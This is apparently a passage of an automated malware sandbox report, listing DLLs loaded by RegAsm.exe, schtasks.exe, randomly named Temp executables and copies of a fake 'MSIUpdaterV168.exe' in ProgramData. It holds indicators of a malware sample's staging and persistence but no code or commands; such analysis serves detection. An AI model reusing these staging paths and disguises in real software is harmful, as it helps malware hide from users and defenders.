Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: acgenral.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: winmm.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: samcli.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: msacm32.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: version.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: userenv.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: dwmapi.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: urlmon.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: mpr.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: winmmbase.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: winmmbase.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: iertutil.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: srvcli.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: netutils.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: aclayers.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: sfc.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: sfc_os.dll
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: acgenral.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: winmm.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: samcli.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: msacm32.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: version.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: userenv.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: dwmapi.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: urlmon.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: mpr.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: winmmbase.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: winmmbase.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: iertutil.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: srvcli.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: netutils.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: aclayers.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: sfc.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: sfc_os.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\3f61nAONpe1PsLC0oJHy.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\3f61nAONpe1PsLC0oJHy.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: acgenral.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: winmm.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: samcli.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: msacm32.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: version.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: userenv.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: dwmapi.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: urlmon.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: mpr.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: winmmbase.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: winmmbase.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: iertutil.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: srvcli.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: netutils.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: aclayers.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: sfc.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: sfc_os.dll
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll
